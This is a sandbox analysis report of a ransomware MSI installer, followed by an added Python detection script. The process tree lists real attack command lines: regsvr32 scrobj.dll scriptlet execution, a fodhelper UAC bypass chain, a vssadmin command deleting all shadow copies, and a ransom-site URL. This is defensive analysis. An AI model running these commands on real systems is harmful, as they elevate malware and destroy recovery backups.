Analysis

  • max time kernel
    229s
  • max time network
    252s
  • platform
    windows10_x64
  • resource
    win10-20220414-en
  • submitted
    23-05-2022 05:32

General

  • Target

    MAG.msi

  • Size

    96KB

  • MD5

    957d0c81c985609c580565a0323a14cd

  • SHA1

    d8d46413409a14a1ae407107016e28074c6824d5

  • SHA256

    9180fe1ea22b07841146ba483d454faf092c8cd9fed14222a08b7392cda2e7be

  • SHA512

    0ff024ff07ab13e7d308429fd8906560e58610b63a7dd468f6b5b6c86221962dbc27e93090e5607104201e9cabe90b52affba54411a541f5c2f5369db231cf52

Score
9/10

Malware Config

Signatures

  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Modifies extensions of user files 6 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 1 IoCs
  • Enumerates connected drives 3 TTPs 48 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Suspicious use of SetThreadContext 3 IoCs
  • Drops file in Windows directory 13 IoCs
  • Checks SCSI registry key(s) 3 TTPs 64 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Interacts with shadow copies 2 TTPs 6 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Modifies Internet Explorer settings 1 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 2 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious behavior: MapViewOfSection 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k unistacksvcgroup -s CDPUserSvc
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2356
    • \??\c:\windows\system32\regsvr32.exe
      regsvr32.exe scrobj.dll /s /u /n /i:../../../Users/Public/rtuvkf9dn
      2⤵
      • Modifies registry class
      PID:4820
    • \??\c:\windows\system32\cmd.exe
      cmd /c "start fodhelper.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2832
      • C:\Windows\system32\fodhelper.exe
        fodhelper.exe
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3888
        • C:\Windows\system32\regsvr32.exe
          "regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/glvt6878zb
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:4316
          • C:\Windows\System32\vssadmin.exe
            "C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet
            5⤵
            • Interacts with shadow copies
            PID:3544
    • \??\c:\windows\system32\cmd.exe
      cmd /c "start fodhelper.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3900
      • C:\Windows\system32\fodhelper.exe
        fodhelper.exe
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4660
        • C:\Windows\system32\regsvr32.exe
          "regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/glvt6878zb
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:4720
          • C:\Windows\System32\vssadmin.exe
            "C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet
            5⤵
            • Interacts with shadow copies
            PID:3028
  • c:\windows\system32\sihost.exe
    sihost.exe
    1⤵
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:2348
    • \??\c:\windows\system32\regsvr32.exe
      regsvr32.exe scrobj.dll /s /u /n /i:../../../Users/Public/rtuvkf9dn
      2⤵
      • Modifies registry class
      PID:3332
    • \??\c:\windows\system32\cmd.exe
      cmd /c "start fodhelper.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1928
      • C:\Windows\system32\fodhelper.exe
        fodhelper.exe
        3⤵
        • Drops file in Windows directory
        • Suspicious use of WriteProcessMemory
        PID:4788
        • C:\Windows\system32\regsvr32.exe
          "regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/glvt6878zb
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:4824
          • C:\Windows\System32\vssadmin.exe
            "C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet
            5⤵
            • Interacts with shadow copies
            PID:4300
    • \??\c:\windows\system32\cmd.exe
      cmd /c "start fodhelper.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1796
      • C:\Windows\system32\fodhelper.exe
        fodhelper.exe
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4136
        • C:\Windows\system32\regsvr32.exe
          "regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/glvt6878zb
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:2212
          • C:\Windows\System32\vssadmin.exe
            "C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet
            5⤵
            • Interacts with shadow copies
            PID:4828
  • c:\windows\system32\taskhostw.exe
    taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2408
    • \??\c:\windows\system32\regsvr32.exe
      regsvr32.exe scrobj.dll /s /u /n /i:../../../Users/Public/rtuvkf9dn
      2⤵
      • Modifies registry class
      PID:2248
    • \??\c:\windows\system32\cmd.exe
      cmd /c "start fodhelper.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1852
      • C:\Windows\system32\fodhelper.exe
        fodhelper.exe
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4792
        • C:\Windows\system32\regsvr32.exe
          "regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/glvt6878zb
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:4220
          • C:\Windows\System32\vssadmin.exe
            "C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet
            5⤵
            • Interacts with shadow copies
            PID:5108
    • \??\c:\windows\system32\cmd.exe
      cmd /c "start fodhelper.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2268
      • C:\Windows\system32\fodhelper.exe
        fodhelper.exe
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3532
        • C:\Windows\system32\regsvr32.exe
          "regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/glvt6878zb
          4⤵
          PID:3112
          • C:\Windows\System32\vssadmin.exe
            "C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet
            5⤵
            • Interacts with shadow copies
            PID:3632
  • C:\Windows\system32\msiexec.exe
    msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\MAG.msi
    1⤵
    • Enumerates connected drives
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    PID:2560
  • C:\Windows\system32\msiexec.exe
    C:\Windows\system32\msiexec.exe /V
    1⤵
    • Enumerates connected drives
    • Drops file in Windows directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:3024
    • C:\Windows\system32\srtasks.exe
      C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2
      2⤵
      PID:4236
    • C:\Windows\System32\MsiExec.exe
      C:\Windows\System32\MsiExec.exe -Embedding 53CFB544B82E127F11ECB8651B1FC4E5
      2⤵
      • Modifies extensions of user files
      • Loads dropped DLL
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of WriteProcessMemory
      PID:4116
      • C:\Windows\System32\cmd.exe
        cmd /c "start microsoft-edge:http://f2a4cab8bmeemybio.cryless.info/meemybio^&1^&31330646^&80^&399^&2215063
        3⤵
        • Checks computer location settings
        PID:3516
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:3928
  • \??\c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s DsmSvc
    1⤵
    • Checks SCSI registry key(s)
    • Modifies data under HKEY_USERS
    PID:5004
  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious use of SetWindowsHookEx
    PID:1016
  • C:\Windows\system32\browser_broker.exe
    C:\Windows\system32\browser_broker.exe -Embedding
    1⤵
    • Modifies Internet Explorer settings
    PID:4508
  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
    1⤵
    • Modifies registry class
    • Suspicious behavior: MapViewOfSection
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:804
  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    PID:656
  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
    1⤵
    • Modifies registry class
    PID:428
  • C:\Windows\system32\OpenWith.exe
    C:\Windows\system32\OpenWith.exe -Embedding
    1⤵
    • Suspicious use of SetWindowsHookEx
    PID:1688
  • C:\Windows\system32\OpenWith.exe
    C:\Windows\system32\OpenWith.exe -Embedding
    1⤵
    • Suspicious use of SetWindowsHookEx
    PID:3544
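The tree above repeats one chain under three different user-session hosts (svchost.exe -k unistacksvcgroup, sihost.exe and taskhostw.exe, each also tagged with WriteProcessMemory): regsvr32.exe loads scrobj.dll with /i: pointing at an extensionless scriptlet dropped in C:\Users\Public, then cmd.exe starts fodhelper.exe, which spawns a second regsvr32.exe scriptlet host, which runs vssadmin Delete Shadows /all /quiet. fodhelper.exe is an auto-elevating Windows binary with no reason to spawn children of its own; a child under it is the shape of the well-known fodhelper UAC bypass, which hijacks the per-user ms-settings handler under HKCU\Software\Classes (the "Modifies registry class" tag on the first regsvr32 instances is consistent with that, though the report does not show the key). The Python below is an added detection example, not part of the sandbox output. It scores constructed process-creation events built from one branch of this tree (PIDs, images and command lines from the report, parent PIDs inferred from the nesting, two benign control events invented) and links the vssadmin deletion back to fodhelper.exe through the parent chain.

```python
"""Detection logic for the chain in the process tree above (added example, not sandbox output):
cmd -> fodhelper.exe -> regsvr32.exe scrobj.dll /i:<scriptlet> -> vssadmin Delete Shadows.
Sample events are constructed: PIDs, images and command lines come from the report,
parent PIDs are inferred from the tree nesting, the two benign controls are invented."""
import re
from dataclasses import dataclass
from typing import Dict, Iterable, List, Optional, Set, Tuple

@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str     # image path as a process-creation log (Sysmon event 1 style) records it
    cmdline: str

def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

VSS_DELETE_RE = re.compile(r"\bdelete\s+shadows\b.*[/-]all\b", re.IGNORECASE)
SCROBJ_RE = re.compile(r"\bscrobj\.dll\b", re.IGNORECASE)
INSTALL_ARG_RE = re.compile(r"(?:^|\s)/i:(\S+)", re.IGNORECASE)

def is_shadow_copy_deletion(ev: ProcEvent) -> bool:
    """vssadmin wiping every shadow copy (T1490); a read-only 'list shadows' must not match."""
    return basename(ev.image) == "vssadmin.exe" and bool(VSS_DELETE_RE.search(ev.cmdline))

def scriptlet_target(ev: ProcEvent) -> Optional[str]:
    """The /i: argument when regsvr32 is used as a scriptlet host via scrobj.dll, else None."""
    if basename(ev.image) != "regsvr32.exe" or not SCROBJ_RE.search(ev.cmdline):
        return None
    m = INSTALL_ARG_RE.search(ev.cmdline)
    return m.group(1).strip('"') if m else None

def is_untrusted_scriptlet_path(target: str) -> bool:
    """Relative traversal or the world-writable Users\\Public directory as scriptlet source."""
    norm = target.replace("/", "\\").lower()
    return "..\\" in norm or "\\users\\public\\" in norm

def ancestors(pid: int, by_pid: Dict[int, ProcEvent], limit: int = 32) -> List[ProcEvent]:
    """Parent chain of pid, nearest first; seen-set and limit guard against PID-reuse loops."""
    chain, seen, cur = [], {pid}, by_pid.get(pid)
    while cur is not None and len(chain) < limit:
        parent = by_pid.get(cur.ppid)
        if parent is None or parent.pid in seen:
            break
        seen.add(parent.pid)
        chain.append(parent)
        cur = parent
    return chain

def evaluate(events: Iterable[ProcEvent]) -> List[Tuple[int, str]]:
    """Per-event findings as sorted (pid, rule) pairs."""
    by_pid = {ev.pid: ev for ev in events}
    findings: List[Tuple[int, str]] = []
    for ev in by_pid.values():
        if is_shadow_copy_deletion(ev):
            findings.append((ev.pid, "vssadmin_delete_shadows"))
        target = scriptlet_target(ev)
        if target is not None:
            findings.append((ev.pid, "regsvr32_scrobj_scriptlet"))
            if is_untrusted_scriptlet_path(target):
                findings.append((ev.pid, "scriptlet_from_untrusted_path"))
        parent = by_pid.get(ev.ppid)
        # fodhelper.exe auto-elevates and has no business spawning children of its own
        if parent is not None and basename(parent.image) == "fodhelper.exe":
            findings.append((ev.pid, "fodhelper_spawned_child"))
    return sorted(findings)

def shadow_deletion_via_fodhelper(events: Iterable[ProcEvent]) -> Set[int]:
    """PIDs of shadow-copy deletions whose ancestry holds both a scriptlet host and fodhelper.exe."""
    by_pid = {ev.pid: ev for ev in events}
    hits: Set[int] = set()
    for ev in filter(is_shadow_copy_deletion, by_pid.values()):
        lineage = ancestors(ev.pid, by_pid)
        if any(scriptlet_target(a) for a in lineage) and any(basename(a.image) == "fodhelper.exe" for a in lineage):
            hits.add(ev.pid)
    return hits

SAMPLE_EVENTS = [
    # one branch of the report's tree; ppid 0 marks a parent the report does not show
    ProcEvent(2356, 0, r"C:\Windows\System32\svchost.exe", "svchost.exe -k unistacksvcgroup -s CDPUserSvc"),
    ProcEvent(4820, 2356, r"C:\Windows\System32\regsvr32.exe", "regsvr32.exe scrobj.dll /s /u /n /i:../../../Users/Public/rtuvkf9dn"),
    ProcEvent(2832, 2356, r"C:\Windows\System32\cmd.exe", 'cmd /c "start fodhelper.exe"'),
    ProcEvent(3888, 2832, r"C:\Windows\System32\fodhelper.exe", "fodhelper.exe"),
    ProcEvent(4316, 3888, r"C:\Windows\System32\regsvr32.exe", '"regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/glvt6878zb'),
    ProcEvent(3544, 4316, r"C:\Windows\System32\vssadmin.exe", r'"C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet'),
    # invented benign controls: a read-only vssadmin query and an ordinary DLL registration
    ProcEvent(6100, 0, r"C:\Windows\System32\vssadmin.exe", "vssadmin.exe list shadows"),
    ProcEvent(6200, 0, r"C:\Windows\System32\regsvr32.exe", r'regsvr32.exe /s "C:\Program Files\Example\example.dll"'),
]

if __name__ == "__main__":
    for pid, rule in evaluate(SAMPLE_EVENTS):
        print(f"{pid}\t{rule}")
    print("fodhelper->scriptlet->vssadmin chain:", sorted(shadow_deletion_via_fodhelper(SAMPLE_EVENTS)))
```

The rules key on parent/child relationships and command-line shape rather than on the first-hop parent, because that parent differs per branch in this report. Against real telemetry, feed Sysmon Event 1 or Security 4688 (with command-line auditing enabled) into ProcEvent. The seen-set in ancestors() stops the walk when a PID has been reused, which this very report shows happening: 3544 is both a vssadmin.exe and an OpenWith.exe PID.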

Network

MITRE ATT&CK Matrix ATT&CK v6

  • Defense Evasion
    File Deletion, T1107 (2 matching signatures)
    Modify Registry, T1112 (1 matching signature)
  • Discovery
    Query Registry, T1012 (3 matching signatures)
    System Information Discovery, T1082 (3 matching signatures)
    Peripheral Device Discovery, T1120 (2 matching signatures)
  • Impact
    Inhibit System Recovery, T1490 (2 matching signatures)

Downloads

  • C:\Users\Public\glvt6878zb
    Filesize: 1KB
    MD5: fe4a708f201a02075821a3adfbf46722
    SHA1: 0043a0976efb85b573fa959f7db59ff3ea751561
    SHA256: e9abfc3edda27e0f5f0ce7714c8970ef7ab1408ec90db605500c3ef1130f4893
    SHA512: cd470d22741cc6913f6ad8a2aee53073d7ba8a90d1adb6feece3ec38a29248c63e77c0b156cb4fe24ca1895c116148de6f4d738ec56b24d2db0b6c5d33d1f87a

  • C:\Users\Public\rtuvkf9dn
    Filesize: 3KB
    MD5: 9287a7c05440f4fba02ddc00bbc0d2dc
    SHA1: d6d4fd6acec6367ab60e52025090c95b03470812
    SHA256: 27c670a5554474ec71f3bd734787d626685e6df1e49a34d94588ee020a25efb2
    SHA512: 522da9172415787757f13ec50a0f67763c0bd0addf09a62621d74c3fcc4cbf702b283d9c19f195eb130f1647f096b046e25d62e93f584bbe9e471cd5b11d1aae

  • C:\Windows\Installer\MSIC47D.tmp
    Filesize: 52KB
    MD5: d6959db7ef3dd8a1d7576dc07b58ac20
    SHA1: 5d61f82d962bca473eb499a97dd8bd2b0c89787d
    SHA256: e04d0b1a3abde3e3294736ca90fb39121b7c36015e812fa903e1050dc93a2d6c
    SHA512: e0d47ab5b67b0c0e0a5657fedf1827e6ef7e9e81bcc85afd406da1bb84a7f62b383da799f3dd864468c7ed8746731c1984ec281cd3b23396cb34eb61da5fadc1

  • \??\Volume{a312788f-0000-0000-0000-d01200000000}\System Volume Information\SPP\OnlineMetadataCache\{438e33c7-8242-4805-9360-9102c5446ef9}_OnDiskSnapshotProp
    Filesize: 5KB
    MD5: a74a34ad0ddc842a7851d52688d7303f
    SHA1: e2ec49c6093d0a1fe7c1602a3f422a0045fe02bd
    SHA256: d91fbce6f505a982cd6c177e189ee4ccae540ad1b000db4e62790ee2d864da3c
    SHA512: d7d8175d5057adb6546ca6fbc65505a94e64724293c73226564195ba6b098f129ebdf64f8c22cdef32002a9308f520a143c4f9544839839e3be2a22ffd307a25

  • \Windows\Installer\MSIC47D.tmp
    Filesize: 52KB
    MD5: d6959db7ef3dd8a1d7576dc07b58ac20
    SHA1: 5d61f82d962bca473eb499a97dd8bd2b0c89787d
    SHA256: e04d0b1a3abde3e3294736ca90fb39121b7c36015e812fa903e1050dc93a2d6c
    SHA512: e0d47ab5b67b0c0e0a5657fedf1827e6ef7e9e81bcc85afd406da1bb84a7f62b383da799f3dd864468c7ed8746731c1984ec281cd3b23396cb34eb61da5fadc1

  • memory/1016-138-0x000001A6A4D20000-0x000001A6A4D30000-memory.dmp
    Filesize: 64KB
  • memory/1016-137-0x000001A6A4C20000-0x000001A6A4C30000-memory.dmp
    Filesize: 64KB
  • memory/1796-157-0x0000000000000000-mapping.dmp
  • memory/1852-143-0x0000000000000000-mapping.dmp
  • memory/1928-144-0x0000000000000000-mapping.dmp
  • memory/2212-164-0x0000000000000000-mapping.dmp
  • memory/2248-132-0x0000000000000000-mapping.dmp
  • memory/2268-159-0x0000000000000000-mapping.dmp
  • memory/2348-135-0x0000024A8B4A0000-0x0000024A8B4A3000-memory.dmp
    Filesize: 12KB
  • memory/2832-145-0x0000000000000000-mapping.dmp
  • memory/3028-165-0x0000000000000000-mapping.dmp
  • memory/3112-167-0x0000000000000000-mapping.dmp
  • memory/3332-126-0x0000000000000000-mapping.dmp
  • memory/3516-136-0x0000000000000000-mapping.dmp
  • memory/3532-162-0x0000000000000000-mapping.dmp
  • memory/3544-153-0x0000000000000000-mapping.dmp
  • memory/3632-168-0x0000000000000000-mapping.dmp
  • memory/3888-146-0x0000000000000000-mapping.dmp
  • memory/3900-158-0x0000000000000000-mapping.dmp
  • memory/4116-134-0x000001E40CA20000-0x000001E40CA2C000-memory.dmp
    Filesize: 48KB
  • memory/4116-121-0x0000000000000000-mapping.dmp
  • memory/4136-161-0x0000000000000000-mapping.dmp
  • memory/4220-151-0x0000000000000000-mapping.dmp
  • memory/4236-120-0x0000000000000000-mapping.dmp
  • memory/4300-155-0x0000000000000000-mapping.dmp
  • memory/4316-150-0x0000000000000000-mapping.dmp
  • memory/4660-160-0x0000000000000000-mapping.dmp
  • memory/4720-163-0x0000000000000000-mapping.dmp
  • memory/4788-147-0x0000000000000000-mapping.dmp
  • memory/4792-148-0x0000000000000000-mapping.dmp
  • memory/4820-129-0x0000000000000000-mapping.dmp
  • memory/4824-149-0x0000000000000000-mapping.dmp
  • memory/4828-166-0x0000000000000000-mapping.dmp
  • memory/5108-154-0x0000000000000000-mapping.dmp